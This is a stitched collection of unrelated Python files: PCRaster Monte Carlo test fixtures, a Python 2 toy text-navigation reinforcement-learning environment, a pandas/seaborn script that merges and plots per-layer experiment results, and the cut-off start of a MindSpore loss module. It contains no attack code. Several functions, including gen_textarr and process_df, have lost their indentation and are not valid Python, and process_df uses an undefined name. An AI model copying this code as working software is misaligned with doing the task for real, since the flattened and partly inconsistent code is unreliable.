        mcPCRasterBase.MonteCarloModel.__init__(self)

    def initial(self):
        pass
class DynamicWithoutAll(dynamicPCRasterBase.DynamicModel, mcPCRasterBase.MonteCarloModel):
    """Dynamic Monte Carlo model defining none of updateWeight/suspend/resume.

    Fixture mirroring StaticWithoutAll for the dynamic framework.
    """
    def __init__(self):
        dynamicPCRasterBase.DynamicModel.__init__(self)
        mcPCRasterBase.MonteCarloModel.__init__(self)

    def initial(self):
        pass
class StaticWithoutSuspend(staticPCRasterBase.StaticModel, mcPCRasterBase.MonteCarloModel):
    """Static Monte Carlo model with updateWeight but no suspend/resume."""
    def __init__(self):
        staticPCRasterBase.StaticModel.__init__(self)
        mcPCRasterBase.MonteCarloModel.__init__(self)

    def initial(self):
        pass

    def updateWeight(self):
        pass
class DynamicWithoutSuspend(dynamicPCRasterBase.DynamicModel, mcPCRasterBase.MonteCarloModel):
    """Dynamic Monte Carlo model with updateWeight but no suspend/resume."""
    def __init__(self):
        dynamicPCRasterBase.DynamicModel.__init__(self)
        mcPCRasterBase.MonteCarloModel.__init__(self)

    def initial(self):
        pass

    def updateWeight(self):
        pass
class StaticWithoutResume(mcPCRasterBase.MonteCarloModel):
    """Monte Carlo model with updateWeight and suspend but no resume."""
    def __init__(self):
        pass

    def initial(self):
        pass

    def updateWeight(self):
        pass

    def suspend(self):
        pass
class DynamicWithoutResume(mcPCRasterBase.MonteCarloModel):
    """Monte Carlo model with updateWeight and suspend but no resume."""
    def __init__(self):
        pass

    def initial(self):
        pass

    def updateWeight(self):
        pass

    def suspend(self):
        pass
#
class T0(mcPCRasterBase.MonteCarloModel):
    """Bare Monte Carlo model fixture: constructor only, no model hooks."""
    def __init__(self):
        pass
#
class T1(mcPCRasterBase.MonteCarloModel):
    """Bare Monte Carlo model fixture, identical in shape to T0."""
    def __init__(self):
        pass
#
class staticModel(mcPCRasterBase.MonteCarloModel):
    """Minimal working static Monte Carlo model reporting maps per sample.

    Reads clone.map from the working directory and writes one report per
    sample in initial() and in the pre/post Monte Carlo loops.
    """
    def __init__(self):
        mcPCRasterBase.MonteCarloModel.__init__(self)
        # NOTE(review): StaticModel.__init__ is called although this class does
        # not list StaticModel as a base -- confirm this is intentional.
        staticPCRasterBase.StaticModel.__init__(self)
        pcraster.setclone("clone.map")
        self.newmap = pcraster.readmap("clone.map")

    def initial(self):
        # One report per Monte Carlo sample, named after the sample number.
        name = "mcsi%d" % (self.currentSampleNumber())
        self.report(self.newmap, name)

    def premcloop(self):
        for sample in self.sampleNumbers():
            name = "premc%d" % (sample)
            self.report(self.newmap, name)

    def postmcloop(self):
        for sample in self.sampleNumbers():
            name = "postmc%d" % (sample)
            self.report(self.newmap, name)
#
class DynamicModel(dynamicPCRasterBase.DynamicModel, mcPCRasterBase.MonteCarloModel, pfPCRasterBase.ParticleFilterModel):
    """Complete dynamic Monte Carlo / particle-filter model fixture.

    Implements every framework hook; suspend/resume assert that the per-sample
    state variable set in initial() survives the suspend/resume round trip.
    """
    def __init__(self):
        dynamicPCRasterBase.DynamicModel.__init__(self)
        mcPCRasterBase.MonteCarloModel.__init__(self)
        pfPCRasterBase.ParticleFilterModel.__init__(self)
        pcraster.setclone("clone.map")
        self.newmap = pcraster.readmap("clone.map")

    def initial(self):
        name = "mcdi%d" % (self.currentSampleNumber())
        self.report(self.newmap, name)
        # Remember the sample number so suspend/resume can verify state.
        self.stateVar = self.currentSampleNumber()

    def premcloop(self):
        for sample in self.sampleNumbers():
            for timestep in self.timeSteps():
                name = "premc_%d_%d" % (sample, timestep)
                self.report("clone.map", name)

    def postmcloop(self):
        for sample in self.sampleNumbers():
            for timestep in self.timeSteps():
                name = "postmc_%d_%d" % (sample, timestep)
                self.report("clone.map", name)

    def dynamic(self):
        name = "mcdd%d" % (self.currentSampleNumber())
        self.report("clone.map", name)

    def updateWeight(self):
        # Random particle weight -- the fixture only needs a valid number.
        return random.random()

    def suspend(self):
        assert self.stateVar == self.currentSampleNumber()

    def resume(self):
        assert self.stateVar == self.currentSampleNumber()
|
"""
Toy example of navigating through text to find the answer to a query.
This is the simplest possible version of the problem.
"""
from control4.core.mdp import MDP
from control4.config import floatX
import numpy as np
def idx2onehot(i, n):
    """Return a length-n vector of dtype floatX with a single 1 at index i."""
    onehot = np.zeros(n, floatX)
    onehot[i] = 1
    return onehot
class TextNavState(object):
    """State of the text-navigation MDP: the character grid, the correct
    answer digit, and the agent's current (row, col) position."""
    def __init__(self,textarr,answer,pos):
        # textarr: 2D array of single characters; binarr caches its one-hot encoding.
        self.textarr = textarr
        self.binarr = textarr2binarr(self.textarr)
        self.answer = answer
        self.pos = pos
    def printme(self):
        # Debug print: show the grid with the agent's cell marked "&".
        # (Python-2 print statements -- this module targets Python 2.)
        textarr = self.textarr.copy()
        r,c = self.pos
        textarr[r,c] = "&"
        print
        print "\n".join([" ".join(row) for row in textarr])
        print
def gen_textarr(height,width,xblocksize):
xblockrow = np.random.randint(low=0,high=height-xblocksize)
xblockcol = np.random.randint(low=0,high=width-xblocksize)
arow = np.random.randint(low=xblockrow,high=xblockrow+xblocksize)
acol = np.random.randint(low=xblockcol,high=xblockcol+xblocksize)
textarr = np.zeros((height,width),dtype="S1")
textarr[:] = "."
textarr[xblockrow:xblockrow+xblocksize,xblockcol:xblockcol+xblocksize]="*"
ans = np.random.randint(low=0,high=2)
textarr[arow,acol] = str(ans)
return textarr,ans
def textarr2binarr(textarr):
    """Encode a char grid as a one-hot uint8 array of shape (height, width, 4).

    Channel order follows `chars`: ".", "*", "0", "1".
    """
    chars = [".","*","0","1"]
    height,width = textarr.shape
    # Precompute one one-hot vector per known character.
    char2bin = {c:idx2onehot(chars.index(c),len(chars)) for c in chars}
    binarr = np.empty((height,width,len(chars)),'uint8')
    # xrange: Python-2 builtin -- this module targets Python 2.
    for row in xrange(height):
        for col in xrange(width):
            binarr[row,col] = char2bin[textarr[row,col]]
    return binarr
class TextNav(MDP):
    """Toy MDP: navigate a character grid and answer a binary query.

    Actions 0-3 move the agent N/E/S/W (clamped at the borders); actions 4
    and 5 answer "0"/"1" and terminate the episode. Observations are the
    one-hot of the current cell's character plus the normalised position.
    """
    def __init__(self, width=10,height=10,xblocksize=3):
        self.width = width
        self.height = height
        self.xblocksize = xblocksize
    def call(self, input_arrs):
        state = input_arrs["x"]
        u = input_arrs["u"]
        assert u.shape[0]==1
        u = u[0]
        # NESW + A0 A1
        height,width = state.textarr.shape
        row,col = state.pos
        done = False
        cost = 0
        if u == 0: # NORTH
            row = max(row-1,0)
        elif u == 1: # EAST
            col = min(col+1,width-1)
        elif u == 2: # SOUTH
            row = min(row+1,height-1)
        elif u == 3: # WEST
            col = max(col-1,0)
        else: # answer 0,1
            # NOTE(review): this evaluates to 0.6 for a correct answer and
            # -0.4 for a wrong one -- a higher "cost" when correct looks
            # inverted; confirm the intended sign convention.
            cost = (u-4==state.answer) - .4
            done = True
        state.pos = (row,col)
        # Observation: 4 one-hot channels for the cell + 2 centred coordinates.
        o = np.concatenate([state.binarr[row,col], state.pos / np.array([self.width,self.height],floatX)-.5]).astype(floatX)
        return {
            "x" : state,
            "o" : o.reshape(1,-1),
            "c" : np.array(cost).reshape(1,-1).astype(floatX),
            "done" : done
        }
    def initialize_mdp_arrays(self):
        # Fresh random grid and a uniformly random starting position.
        textarr,ans = gen_textarr(self.height, self.width,self.xblocksize)
        pos = (np.random.randint(low=0,high=self.height),np.random.randint(low=0,high=self.width))
        state = TextNavState(textarr,ans,pos)
        o_init = np.concatenate([state.binarr[pos[0],pos[1]],pos / np.array([self.width,self.height],floatX)-.5])
        return {
            "x" : state,
            "o" : o_init.reshape(1,-1).astype(floatX),
        }
    def input_info(self):
        return {
            "x" : None,
            "u" : (1,'int64')
        }
    def output_info(self):
        # "o" has 6 components: 4 one-hot channels + 2 position coordinates.
        return {
            "x" : None,
            "o" : (6,floatX),
            "c" : (1,floatX),
            "done" : (None,'uint8')
        }
    def plot(self,input_arrs):
        x = input_arrs["x"]
        x.printme()
    def cost_names(self):
        return ["correct"]
    def num_actions(self):
        # 4 moves + 2 answers.
        return 6
if __name__ == "__main__":
    # Smoke test: construct the MDP and run the framework's self-validation.
    mdp = TextNav()
    mdp.validate()
<filename>merge_vars.py<gh_stars>0
import torch
import numpy as np
import pandas as pd
import os
import sys
from torchsummary import summary
import torch.nn as nn
from collections import defaultdict
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
matplotlib.style.use('ggplot')
import seaborn as sns
sns.set_theme()
sns.set(font_scale=3, rc={'text.usetex' : False})
sns.set_theme()
sns.set_style('whitegrid')
import glob
import re
import pdb
import math
import models
import random
import torch.optim
import torch
import argparse
import utils
from sklearn.linear_model import LogisticRegression
#from torchvision import models, datasets, transforms
# tqdm is optional: fall back to a no-op wrapper when it is not installed.
try:
    from tqdm import tqdm
except ImportError:  # was a bare except, which also swallowed KeyboardInterrupt/SystemExit
    def tqdm(x):
        """Identity stand-in for tqdm when the package is unavailable."""
        return x
def process_epochs(epochs, dirname):
    """Scatter-plot the epoch value recorded for each layer and save the figure.

    Args:
        epochs: sequence with one epoch value per layer.
        dirname: directory in which 'epochs.pdf' is written.
    """
    columns = pd.Index(range(0, len(epochs)), name='layer')
    df = pd.DataFrame(epochs, index=['epoch'], columns=columns)
    df = df.melt()  # long format: one ('layer', 'value') row per layer
    s = df.plot(x='layer', y='value', kind='scatter', ylabel='epoch')
    s.set(ylabel="epoch")
    plt.savefig(fname=os.path.join(dirname, 'epochs.pdf'))
    # Fix: the original leaked matplotlib figures on every call (an unused
    # plt.figure() plus the figure df.plot creates); close them once saved.
    plt.close('all')
    return
def select_min(df):
    """Select the test with the minimal error (usually 0).

    For each layer (level 0 of df's column MultiIndex), finds the trial row
    with the smallest 'error' (ties broken by smallest 'loss') and collects
    those per-layer winners into a single-row frame indexed by 'step'.
    """
    Idx = pd.IndexSlice
    df_min = None
    n_layers = len(df.columns.levels[0])
    #columns = df.columns.name
    indices = np.zeros(n_layers, dtype=int)
    for idx in range(n_layers):
        # replace NaN with 0
        # NOTE(review): the comment above describes a NaN replacement that is
        # not performed here -- confirm whether it happens upstream.
        val_min = df.loc[:, (idx, 'error')].min()
        mask = df.loc[:, (idx, 'error')] == val_min
        indices[idx] = df.loc[mask, (idx, 'loss')].idxmin() # if several min, take the min of them
    # the indices for the try that has the minimum training
    # error at the epoch epoch
    # remove the column index 'try'
    cols = pd.MultiIndex.from_product(df.columns.levels, names=df.columns.names) # all but the try
    df_min = pd.DataFrame(columns=cols, index=[1])
    df_min.index.name = 'step'
    for idx in range(n_layers):
        # select the try that has the minimum training error at the
        # last epoch (at index indices[idx])
        df_min.loc[1, Idx[idx, :]] = df.loc[indices[idx],Idx[idx, :]]#.droplevel('try', axis=1)
    #df_min.loc[:, df_min.columns.get_level_values('layer') == 'last'] = df.xs(('last', idx_last), axis=1, level=[2, 3], drop_level=False).droplevel('try', axis=1)
    #df_min.loc[:, df_min.columns.get_level_values('stat') == 'err'] *= 100
    #df_min = df_min.loc[pd.IndexSlice[:, df_min.columns.get_level_values('layer').isin(range(1, n_layers+1))]]
    #if not df.loc[epoch, ('train', 'err', 1, indices[0] )] == 0:
    # print('Not separated!', dirname)
    #else:
    return df_min
    # print('Separated!', dirname)
def process_df(quant, dirname, stats_ref=None, args=None, args_model=None, save=True):
global table_format
idx = pd.IndexSlice
#losses = quant.loc[:, idx[:, '#loss']]
#errors = quant.loc[:, idx[:, 'error']]
#col_order = ["layer", "set", "stat"]
col_order = ["stat", "set", "layer"]
if quant.columns.names != col_order:
# the order is
# perform pivot
quant = pd.melt(quant.reset_index(), id_vars="var").pivot(index="var", columns=col_order, values="value")
idx_order = ["stat", "set"]
if stats_ref.index.names !=idx_order:
stats_ref = stats_ref.reorder_levels(idx_order).sort_index(axis=0)
quant_describe = quant.groupby(level=["stat", "set"], axis=1, group_keys=False).describe()
if save:
quant.to_csv(os.path.join(dirname, 'quant.csv'))
if stats_ref is not None:
stats_ref.to_csv(os.path.join(dirname, 'stats_ref.csv'))
quant_describe.to_csv(os.path.join(dirname, 'describe.csv'))
# table_err_train = table["err"]["train"]
#quant.loc[:, Idx[:, :, "err"]] *= 100
if len(stats_ref.keys()) == 1:
stats_ref = stats_ref[stats_ref.keys()[0]]
#quant["err"] *= 100
#stats_ref_copy = stats_ref.copy()
#stats_ref_copy["err"] = stats_ref["err"] * 100
stats_ref.sort_index(axis=0, inplace=True)
quant.sort_index(axis=1, inplace=True)
#losses.to_csv(os.path.join(dirname, 'losses.csv'))
#errors.to_csv(os.path.join(dirname, 'errors.csv'))
N_L = len(quant.columns.unique(level="layer")) # number of layers
#N_sets = len(quant.columns.unique(level="set"))
N_sets=2 # only train and test
palette=sns.color_palette(n_colors=N_sets)
#losses.describe().to_csv(os.path.join(dirname, 'losses_describe.csv'))
df_reset = quant.reset_index()
#relative quantities
#N_L = len(quant.columns.unique(level="layer")) -1 # number of hidden layers
N_S = len(stats_ref)
stats_ref_val = stats_ref.iloc[np.repeat(np.arange(N_S), N_L)].values
quant_rel = (quant.loc[:, Idx[:, :, :]] - stats_ref_val).abs()
quant_rel["err"] *= 100
quant["err"] *= 100
try:
# utils.to_latex(dirname, quant, table_format)
utils.to_latex(dirname, quant_rel, table_format)
except:
pass
#quant_rel["err"] *= 100
#errors.describe().to_csv(os.path.join(dirname, 'errors_describe.csv'))
#f, axes = plt.subplots(1, 2, figsize=[10., 5.])
df_reset = quant.reset_index()
df_plot = pd.melt(df_reset, id_vars='try')
df_reset_rel = quant_rel.reset_index()
df_plot_rel = pd.melt(df_reset_rel, id_vars="var")
rp = sns.relplot(
#data = df_plot.query('layer > 0'),
data=df_plot_rel,
#col='log_mult',
hue='set',
hue_order=["train", "test"],
#dodge=False,
col='stat',
col_order=["loss", "err"],
#col='set',
#style='layer',
#col='log_mult',
x='layer',
y='value',
kind='line',
ci='sd',
palette=palette,
#ax=axes[0],
#kind='line',
#ylabel='%',
#ci='sd',
#col_wrap=2,
facet_kws={
'sharey': False,
'sharex': True
}
)
rp.axes[0,0].set_title("Loss")
rp.axes[0,0].set_ylabel("absolute delta loss")
rp.axes[0,1].set_title("Error")
rp.axes[0,1].set_ylabel("absolute delta error (%)")
rp.legend.set_title("Datasets")
# rp.fig.set_size_inches(11,4)
#rp.axes[0,0].margins(.05)
#rp.axes[0,1].margins(.05)
# rp.legend.set_title("Datasets")
# rp.fig.set_size_inches(12, 4.5)
# rp.axes[0,0].margins(.05)
# rp.axes[0,1].margins(.05)
rp.set(xticks=range(N_L))
# xlabels=np.arange(N_L)
# rp.axes[0,0].set_xticklabels(np.arange(N_L))
# rp.axes[0,1].set_xticklabels(np.arange(N_L))
#rp.set_xticks(len(xlabels))
# rp.set_xlabels(xlabels)
rp.axes[0,0].set_xlabel("layer index l")
rp.axes[0,1].set_xlabel("layer index l")
if args_model is not None:
rp.fig.suptitle("(A) FCN {}".format(args_model.dataset.upper()))
# try:
# # vl_left = rp.axes[0,0].viewLim
# # Dx = vl_left[1][0] - vl_left[0][0]
# # Dy = vl_left[1][1] - vl_left[0][1]
# ax0 = rp.axes[0,0]
# pt = (ax0.viewLim.x0,0)
# #(0,0) in axes coordinates
# x,y = (ax0.transData + ax0.transAxes.inverted()).transform(pt)
# K = 0.1
# x = x-K
# rp.axes[0,0].text(x, y+K, "{:.2f}".format(stats_ref["loss"]["train"]), color=palette[0], transform=rp.axes[0,0].transAxes)
# rp.axes[0,0].text(x, y-K, "{:.2f}".format(stats_ref["loss"]["test"]), color=palette[1], transform=rp.axes[0,0].transAxes)
# # vl_right = rp.axes[0,1].viewLim
# # Dx = vl_right[1][0] - vl_right[0][0]
# # Dy = vl_right[1][1] - vl_right[0][1]
# ax1 = rp.axes[0,1]
# pt = (ax1.viewLim.x0,0)
# #(0,0) in axes coordinates
# x,y = (ax1.transData + ax1.transAxes.inverted()).transform(pt)
# K = 0.1
# x = x-K
# rp.axes[0,1].text(x, y+K, "{:.2f}".format(100*stats_ref["err"]["train"]), color=palette[0], transform=rp.axes[0,1].transAxes)
# rp.axes[0,1].text(x, y-K, "{:.2f}".format(100*stats_ref["err"]["test"]), color=palette[1], transform=rp.axes[0,1].transAxes)
# except:
# pass
sns.lineplot(
#data=rel_losses.min(axis=0).to_frame(name="loss"),
data=df_plot_rel.query("stat=='loss'").pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
#hue="width",
hue="set",
hue_order=["train", "test"],
#col="stat",
#col_order=["loss", "error"],
x="layer",
y="value",
#kind='line',
#legend="full",
#style='set',
legend=False,
ax=rp.axes[0,0],
alpha=0.5,
#style='layer',
#markers=['*', '+'],
dashes=[(2,2),(2,2)],
)
for ax in rp.axes[0,0].lines[-2:]: # the last two
ax.set_linestyle('--')
sns.lineplot(
#data=rel_losses.min(axis=0).to_frame(name="loss"),
data=df_plot_rel.query("stat=='err'").pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
#hue="width",
hue="set",
hue_order=["train", "test"],
#col="stat",
#col_order=["loss", "error"],
x="layer",
y="value",
#kind='line',
#legend="full",
#style='set',
legend=False,
ax=rp.axes[0,1],
alpha=0.5,
#palette=sns.color_palette(n_colors=N_L),
#style='layer',
markers=True,
dashes=[(2,2),(2,2)],
)
# rp.axes[0,1].lines[-1].set_linestyle('--')
for ax in rp.axes[0,1].lines[-2:]: # the last two
ax.set_linestyle('--')
# if stats_ref is not None:
# sns.lineplot(
# data=stats_ref.query('stat=="loss"').reset_index(), # repeat the datasaet N_L times
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,0],
# x=np.tile(np.linspace(1, N_L, num=N_L), 2),
# style='set',
# dashes=True,
# legend=False,
# #y="value",)
# )
# sns.lineplot(
# data=stats_ref.query('stat=="err"').iloc[np.tile(np.arange(2), N_L)].reset_index(), # repeat the datasaet N_L times
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,1],
# x=np.tile(np.linspace(0, N_L, num=N_L), 2),
# style='set',
# dashes=True,
# legend=False,
# #dashes=[(2,2),(2,2)],
# #y="value",)
# )
# sns.lineplot(
# #data=df_plot.stats_ref.query('stat=="err"').iloc[np.tile(np.arange(2), N_L)].reset_index(), # repeat the datasaet N_L times
# data=df_plot.query('stat=="loss"').pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,0],
# #x=np.tile(np.linspace(0, N_L, num=N_L), 2),
# x='layer',
# alpha=0.5,
# style='set',
# dashes=True,
# legend=False,
# #dashes=[(2,2),(2,2)],
# y="value",)
# sns.lineplot(
# #data=df_plot.stats_ref.query('stat=="err"').iloc[np.tile(np.arange(2), N_L)].reset_index(), # repeat the datasaet N_L times
# data=df_plot.query('stat=="err"').pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,1],
# #x=np.tile(np.linspace(0, N_L, num=N_L), 2),
# x='layer',
# alpha=0.5,
# style='set',
# dashes=True,
# legend=False,
# #dashes=[(2,2),(2,2)],
# y="value",)
#rpset_xticklabels(range(N_L))
# if is_vgg:
# xlabels=["conv1", "conv2", "conv3", "conv4", "conv5", "conv6", "conv7", "conv8", "fc1", "fc2"]
# #mp.set_xticks(len(xlabels))
# rp.set_xlabels(xlabels)
#if stats_ref is not None:
plt.savefig(fname=os.path.join(dirname, 'relplot.pdf'), bbox_inches="tight")
plt.figure()
#df_reset = quant.().reset_index()
#df_plot = pd.melt(df_reset, id_vars='try')
bp = sns.relplot(
data=df_plot.pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
#col='log_mult',
hue='set',
hue_order=["train", "test"],
#dodge=False,
col='stat',
col_order=["loss", "err"],
#col_order=["train", "test", "val"],
#kcol="set",
#col='set',
#style='layer',
#col='log_mult',
x='layer',
y='value',
kind='line',
#ci=100,
#ax=axes[0],
#kind='line',
#ylabel='%',
#ci=100,
#col_wrap=2,
facet_kws={
'sharey': False,
'sharex': True
}
)
df_ref = df_plot.query('layer==0')
bp.axes[0,0].set_title("Loss")
bp.axes[0,0].set_ylabel("loss")
bp.axes[0,1].set_title("Error")
bp.axes[0,1].set_ylabel("absolute error (%)")
#bp.axes[0,0].plot(quant.columns.levels("layer"), quant.loc[1, (0, "loss")], color=red, label='')
plt.savefig(fname=os.path.join(dirname, 'min_plot.pdf'))
fig=plt.figure()
df_reset = quant.notnull().reset_index()
df_plot = pd.melt(df_reset, id_vars='try')
g = sns.relplot(
data = df_plot,
#col='',
#hue='set',
col='stat',
x='layer',
y='value',
kind='line',
ci=None,
#col_wrap=2,
facet_kws={
'sharey': False,
'sharex': True
}
)
g.fig.subplots_adjust(top=0.9, left=1/g.axes.shape[1] * 0.1)
if args_model is not None and args is not None:
width = args_model.width
if width is None:
if args_model.dataset == "mnist":
width = 245 # WARNING hard coded
removed = "width / {}".format(args.fraction) if hasattr(args, 'fraction') and args.fraction is not None else args.remove
g.fig.suptitle('ds = {}, width = {}, removed = {}, try = {}'.format(args_model.dataset, width, removed, args.ntry))
g.set(yscale='linear')
plt.savefig(fname=os.path.join(dirname, 'plot.pdf'))
g.set(yscale='log')
plt.savefig(fname=os.path.join(dirname, 'plot_log.pdf'))
plt.close('all')
return
def process_checkpoint(checkpoint):
    '''Process a previously computed result stored inside a checkpoint (copy test).

    Args:
        checkpoint (dict): loaded checkpoint with keys 'quant' (the results
            DataFrame) and 'args' (the namespace used to produce it; its
            `path_output` attribute tells where the plots are written).
    '''
    quant = checkpoint['quant']
    args = checkpoint['args']
    # delegate plotting / saving to the shared processing routine
    process_df(quant, args.path_output)
def read_csv(file_csv):
    '''Read a result table saved by this script back into a DataFrame.

    The table is stored with a 3-level column MultiIndex; after a round
    trip through CSV the "layer" level comes back as strings, so it is
    coerced back to integers here.

    Args:
        file_csv: path (or buffer) of the CSV file to read.

    Returns:
        pd.DataFrame with the "layer" column level converted to int.
    '''
    quant = pd.read_csv(file_csv, header=[0, 1, 2], index_col=0)
    layer_idx = quant.columns.names.index("layer")
    # dtype.kind check is platform independent (`== int` compares against
    # the platform default integer width only)
    if quant.columns.get_level_values(layer_idx).dtype.kind != "i":
        new_layer_lvl = [int(v) for v in quant.columns.get_level_values(layer_idx)]
        arrays = [new_layer_lvl if i == layer_idx else quant.columns.get_level_values(i)
                  for i in range(quant.columns.nlevels)]
        quant.columns = pd.MultiIndex.from_arrays(arrays, names=quant.columns.names)
    return quant
def process_csv(file_csv):
    '''Read a previously saved quant CSV and regenerate its plots.

    If a training checkpoint lives next to the CSV, its stored args are
    forwarded so that plot titles can mention the model configuration.

    Args:
        file_csv: path of the quant.csv file to process.
    '''
    quant = read_csv(file_csv)
    dirname = os.path.dirname(file_csv)
    file_chkpt = os.path.join(dirname, "checkpoint.pth")
    args_model = None
    if os.path.isfile(file_chkpt):
        # map to CPU so checkpoints saved on GPU machines load anywhere
        chkpt = torch.load(file_chkpt, map_location="cpu")
        args_model = chkpt["args"]
    process_df(quant, dirname, args_model=args_model, save=False)
# def eval_test_set(checkpoint, fname, log_fname):
# '''Eval the model on the test set'''
# args = checkpoint['args']
# quant = checkpoint['quant']
# train_dataset, test_dataset, num_chs = utils.get_dataset(dataset=args.dataset,
# dataroot=args.dataroot,
# )
# train_loader, size_train,\
# val_loader, size_val,\
# test_loader, size_test = utils.get_dataloader( train_dataset, test_dataset, batch_size =args.batch_size, ss_factor=1, size_max=args.size_max, collate_fn=None, pin_memory=True)
# classifier = utils.parse_archi(log_fname)
# loss_test, err_test = eval_epoch(model, test_loader)
# quant.columns.name = add_sets
# quant.loc[epoch, ('test', 'loss')] = loss_test
# quant.loc[epoch, ('test', 'err')] = err_test
def process_subdir(subdir, device, N_L=5, N_T=20):
    '''Collect the per-entry checkpoints of one experiment sub-directory.

    Every "checkpoint_entry_*.pth" file holds the quant DataFrame of one
    entry layer; they are concatenated column-wise into a single bundle.

    Args:
        subdir: directory containing the checkpoint_entry_*.pth files.
        device: torch device (or map_location string) used to load them.
        N_L: number of layers, used to pre-build the empty column index.
        N_T: number of optimization steps, used as the row index.

    Returns:
        (df_bundle, epochs, args): concatenated DataFrame, a dict mapping
        entry layer -> stored epoch count, and the args namespace of the
        last checkpoint read (None when no checkpoint was found).
    '''
    layers = np.arange(1, N_L + 1)  # the different layers, forward order
    stats = ['loss', 'error']
    # BUG FIX: from_product builds a 2-level index, so exactly two names
    # (the original passed three and raised ValueError)
    columns = pd.MultiIndex.from_product([layers, stats], names=['layer', 'stat'])
    index = pd.Index(np.arange(1, N_T + 1), name='steps')
    df_bundle = pd.DataFrame(columns=columns, index=index, dtype=float)
    epochs = {}
    args = None  # stays None when the glob below matches nothing
    df_bundle.sort_index(axis=1, inplace=True)  # sort for quicker access
    for file_entry in glob.glob(os.path.join(subdir, "checkpoint_entry_*.pth"), recursive=False):
        checkpoint = torch.load(file_entry, map_location=device)
        idx_entry = checkpoint['args'].entry_layer
        if idx_entry > 0:  # entry 0 is the reference, not a probe
            args = checkpoint['args']
            epoch = checkpoint['epochs']
            quant = checkpoint['quant']
            df_bundle = pd.concat([df_bundle, quant], ignore_index=False, axis=1)
            epochs[idx_entry] = epoch
    df_bundle.sort_index(axis=1, inplace=True)  # sort for quicker access
    return df_bundle, epochs, args
if __name__ == '__main__':
    torch.autograd.set_detect_anomaly(True)
    parser = argparse.ArgumentParser('Combine the different vars for experiment A/B')
    parser.add_argument('--name', default='eval-copy', type=str, help='the name of the experiment')
    parser_model = parser.add_mutually_exclusive_group(required=False)
    parser_model.add_argument('--model', help='path of the model to separate')
    parser_model.add_argument('--checkpoint', help='path of the previous computation checkpoint')
    parser_model.add_argument('--csv', help='path of the previous saved csv file')
    parser.add_argument('--gd_mode', '-gdm', default='stochastic', choices=['full', 'stochastic'], help='whether the gradient is computed full batch or stochastically')
    parser_device = parser.add_mutually_exclusive_group()
    parser_device.add_argument('--cpu', action='store_true', dest='cpu', help='force the cpu model')
    parser_device.add_argument('--cuda', action='store_false', dest='cpu')
    parser.add_argument('--depth_max', type=int, help='the maximum depth to which operate')
    parser.add_argument('--steps', type=int, default=10, help='The number of steps to take')
    parser.add_argument('--table_format', choices=["wide", "long"], default="long")
    parser.set_defaults(cpu=False)
    parser.add_argument('dirs', nargs='*', help='the directory to process')
    args = parser.parse_args()
    table_format = args.table_format
    device = torch.device('cuda' if torch.cuda.is_available() and not args.cpu else 'cpu')
    dtype = torch.float
    num_gpus = torch.cuda.device_count()

    def get_parent(path):
        '''Return the name of the directory directly containing path.'''
        return os.path.basename(os.path.dirname(path))

    def parse_width(fname):
        '''Return the integer following a "W-" tag in fname, or None.'''
        # BUG FIX: the original escaped the parentheses (matching a literal
        # "W-(d+)") and called the non-existent Pattern.find(); use a real
        # capture group with Pattern.search().
        found = re.search(r"W-(\d+)", fname)
        return int(found.group(1)) if found is not None else None

    Idx = pd.IndexSlice
    if not args.dirs:  # commonpath([]) would raise a bare ValueError
        parser.error('at least one directory to process is required')
    common_dir = os.path.commonpath(args.dirs)
    path_merge = os.path.join(common_dir, 'merge')
    fnames = []
    for dname in args.dirs:
        fnames.extend(glob.glob(os.path.join(dname, "**", "quant.csv"), recursive=True))
    unique_ids = set(map(get_parent, fnames))
    for uid in unique_ids:  # for every f2 etc experiments
        path_output = os.path.join(path_merge, uid)
        df_merge = pd.DataFrame(index=pd.Index([], name="var"))
        df_ref_merge = pd.DataFrame(index=pd.Index([], name="var"))
        os.makedirs(path_output, exist_ok=True)
        for directory in args.dirs:
            # numeric id of the variation, taken from the digits of the
            # directory name (assumes the name contains digits -- TODO confirm)
            vid = int(''.join(c for c in os.path.basename(directory.rstrip('/')) if c.isdigit()))
            id_fnames = glob.glob(os.path.join(directory, "**", uid, "quant.csv"), recursive=True)
            for fn in id_fnames:  # for all variations
                quant = read_csv(fn)
                # keep the best (minimum over steps) value of every column
                quant_min = quant.min(axis=0).to_frame(name=vid).transpose()
                quant_min.index.name = "var"
                fn_ref = os.path.join(os.path.dirname(fn), "stats_ref.csv")
                if os.path.isfile(fn_ref):
                    quant_ref = pd.read_csv(fn_ref, index_col=[0, 1]).transpose().sort_index(axis=1)
                    quant_ref.index = [vid]
                else:
                    # fall back to the layer-0 entry of the quant table itself
                    quant_ref = quant.loc[1, Idx[:, :, 0]].dropna().to_frame().transpose().droplevel("layer", axis=1)
                    quant_ref.index = [vid]
                df_merge = pd.concat([df_merge, quant_min], ignore_index=False, axis=0)
                df_ref_merge = pd.concat([df_ref_merge, quant_ref], ignore_index=False, axis=0)
        df_merge.sort_index(axis=1, inplace=True)
        df_ref_merge.sort_index(axis=1, inplace=True)
        df_merge.to_csv(os.path.join(path_output, 'min.csv'))
        df_ref_merge.to_csv(os.path.join(path_output, 'ref.csv'))
|
<gh_stars>10-100
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Loss functions."""
import mindspore.nn as nn
import mindspore.ops.operations as P
import mindspore.ops as F
from mindspore.common.tensor import Tensor
from mindspore import dtype as mstype
from mindspore.nn.loss.loss import LossBase
from src.config import config_hrnetv2_w48 as config
# Per-class loss weights (19 classes) used by CrossEntropyWithLogitsAndWeights
# to balance the cross-entropy; presumably derived from the dataset class
# frequencies (Cityscapes-style) -- TODO confirm against the data config.
weights_list = [0.8373, 0.918, 0.866, 1.0345,
